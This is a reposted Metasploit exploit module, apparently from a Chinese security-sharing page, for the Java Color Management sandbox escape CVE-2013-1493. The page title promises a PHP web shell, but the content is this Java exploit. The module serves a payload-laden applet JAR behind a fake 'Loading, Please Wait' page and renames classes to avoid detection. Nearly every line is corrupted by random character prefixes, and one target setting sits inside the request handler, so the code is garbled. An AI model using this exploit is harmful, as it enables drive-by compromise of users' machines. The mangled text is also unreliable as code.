STUNSHELL PHP Web Shell远程执行代码

admin

##
5 `# q/ E, k! U
# This file is part of the Metasploit Framework and may be subject to
) b6 \& C; f/ t: Z+ W# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
/ g3 G: I$ d2 L##
require ‘msf/core’
require ‘rex’
class Metasploit3 < Msf::Exploit::Remote
+ s% |; i6 s' k/ a- P6 ?9 ARank = NormalRanking
+ }7 {( x. k5 k8 zinclude Msf::Exploit::Remote::HttpServer::HTML
: E1 d  p  e# a. M( Dinclude Msf::Exploit::EXE
( E; G1 g) c3 |' l, ginclude Msf::Exploit::Remote::BrowserAutopwn
# @5 f, U% w! D# zautopwn_info({ :javascript => false })
7 s  p1 V, S, t, W6 `, l+ vdef initialize( info = {} )
: @3 Y- S* a8 w- Dsuper( update_info( info,
‘Name’ => ‘Java CMM Remote Code Execution’,
‘Description’ => %q{
. Q* B+ E5 ?! ^This module abuses the Color Management classes from a Java Applet to run
( J) H- d2 s: M/ }$ a3 [arbitrary Java code outside of the sandbox as exploited in the wild in February
; d# w2 A! h; C3 j& band March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41
and earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1
systems. This exploit doesn’t bypass click-to-play, so the user must accept the java
( Q7 L4 u. @# S$ twarning in order to run the malicious applet.
$ _, i- e# ?9 F},
0 R! P* [! F( e" Q9 X' y% T; a: t‘License’ => MSF_LICENSE,
‘Author’ =>
8 I6 n0 _! s! k% p% D'Unknown', # Vulnerability discovery and Exploit
% S& h$ Z  p' U# u" r# i% W, u'juan vazquez' # Metasploit module (just ported the published exploit)
* I6 B3 m/ j+ u2 `5 g8 q* f],
‘References’ =>
[
[ 'CVE', '2013-1493' ],
$ B- K1 T3 R& y. W# q1 }: K. @[ 'OSVDB', '90737' ],
[ 'BID', '58238' ],
[ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],
[ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],
7 T7 l3 ?  X5 O; [  v. [* R[ 'URL', 'http://pastie.org/pastes/6581034' ]
- d8 C% ~0 s2 ]' V],
' r* m: k( E% V* M‘Platform’ => [ 'win', 'java' ],
‘Payload’ => { ‘Space’ => 20480, ‘BadChars’ => ”, ‘DisableNops’ => true },
‘Targets’ =>
[
[ 'Generic (Java Payload)',
4 _3 G5 Q9 m; r$ C{
  I* n+ ?4 p& {# O4 v* d'Platform' => 'java',
'Arch' => ARCH_JAVA
}
],
: f. C* x8 ]9 T' s  v[ 'Windows x86 (Native Payload)',
$ W9 q6 l9 V2 s( y1 K  H{
'Platform' => 'win',
'Arch' => ARCH_X86
0 W( k8 H! Y7 \* v! \3 L& Y! M8 B}
]
3 o' I# p. f+ g4 @],
  P' ~: J( a5 c# O, c6 g4 R2 R‘‘DisclosureDate’ => ‘Mar 01 2013′
))
end
def setup
" ?0 G, k# n! spath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Init.class”)
+ X3 h5 v5 z. O+ H- F@init_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Leak.class”)
@leak_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyBufferedImage.class”)
/ i1 _6 v% \0 W; r$ w) j  h: D@buffered_image_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
& j9 d1 _# a, N( Kpath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyColorSpace.class”)
@color_space_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
@init_class_name = rand_text_alpha(“Init”.length)
@init_class.gsub!(“Init”, @init_class_name)
* D+ M1 d2 k7 m6 _7 ]; g0 ~: rsuper
end
def on_request_uri(cli, request)
print_status(“handling request for #{request.uri}”)
case request.uri
: J0 f  d. I) R! {* d) Z+ f- vwhen /\.jar$/i
jar = payload.encoded_jar
% h0 p- ?6 f% r5 ljar.add_file(“#{@init_class_name}.class”, @init_class)
' p1 v$ b' F4 l3 v4 Djar.add_file(“Leak.class”, @leak_class)
jar.add_file(“MyBufferedImage.class”, @buffered_image_class)
jar.add_file(“MyColorSpace.class”, @color_space_class)
  F/ H% ~$ x+ E  X- Q9 A5 tDefaultTarget’ => 1,
& T0 y+ M+ y4 P% g  j8 ]+ o, m, |/ Fmetasploit_str = rand_text_alpha(“metasploit”.length)
payload_str = rand_text_alpha(“payload”.length)
jar.entries.each { |entry|
entry.name.gsub!(“metasploit”, metasploit_str)
  h6 {4 ^! l* Z/ Y1 Q6 ~! Ientry.name.gsub!(“Payload”, payload_str)
entry.data = entry.data.gsub(“metasploit”, metasploit_str)
entry.data = entry.data.gsub(“Payload”, payload_str)
}
: n6 a: i2 w7 E7 [% R$ Djar.build_manifest
send_response(cli, jar, { ‘Content-Type’ => “application/octet-stream” })
" F6 Q7 }0 W3 }; I9 O- r; j, Dwhen /\/$/
4 d, I4 O: V8 p- C0 n* Cpayload = regenerate_payload(cli)
if not payload
print_error(“Failed to generate the payload.”)
send_not_found(cli)
  t+ {& v- J( ]6 H& _return
6 x! `5 D1 l7 t- Kend
/ _$ Y  \* \- y3 {! Dsend_response_html(cli, generate_html, { ‘Content-Type’ => ‘text/html’ })
' E3 p: |. N# ~$ Q' p! j4 @& ^else
7 O3 a/ x8 C; v* z2 Gsend_redirect(cli, get_resource() + ‘/’, ”)
# `5 |2 \# d, T2 \# {( S6 |# K5 send
end
% m) L2 d3 J; R+ t  fdef generate_html
! T+ z) q; W3 ihtml = %Q|<html><head><title>Loading, Please Wait…</title></head>|
html += %Q|<body><center><p>Loading, Please Wait…</p></center>|
html += %Q|<applet archive=”#{rand_text_alpha(8)}.jar” code=”#{@init_class_name}.class” width=”1″ height=”1″>|
/ r. }9 y0 t. \( ?5 bhtml += %Q|</applet></body></html>|
  G* y* j3 p0 Ireturn html
end
% n, t0 a1 A0 c, Q3 h6 k+ G& ]end
5 Q* U# @. M  j0 q# l2 o. [end
" G1 |8 ^$ s! ?6 b1 l& E